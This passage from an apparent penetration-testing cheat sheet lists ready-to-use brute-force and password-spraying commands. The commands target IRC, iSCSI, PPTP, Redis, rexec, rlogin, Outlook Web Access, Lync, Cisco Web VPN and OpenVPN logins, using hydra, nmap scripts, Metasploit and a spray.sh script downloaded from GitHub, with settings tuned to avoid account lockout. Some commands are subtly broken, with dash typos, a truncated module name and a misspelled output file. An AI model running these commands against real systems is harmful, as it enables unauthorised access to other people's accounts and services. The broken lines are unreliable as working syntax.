nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p <PORT> <IP>

04.19 ISCSI

nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 3260 <IP>

04.20 PPTP

cat /usr/share/wordlists/rockyou.txt | thc-pptp-bruter –u <Username> <IP>

04.21 Redis

## ------------------| Using Nmap
nmap --script redis-brute -p 6379 <IP>

## ------------------| Using Hydra
hydra -u -f –P /usr/share/wordlists/rockyou.txt <IP> redis

## ------------------| Using MSF
use auxiliary/scanner/redis/redis_logi

04.22 Rexec

hydra -u -f -l -v -V <username> -P /usr/share/wordlists/rockyou.txt rexec://<Victim-IP> 

04.23 Rlogin

hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rlogin://<Victim-IP>

04.24 OWA

## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01         

## ------------------| Using Spray.sh
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>

04.25 Lync

wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>            

04.26 CISCO Web VPN

wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>

04.27 OpenVPN Web Portal

wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>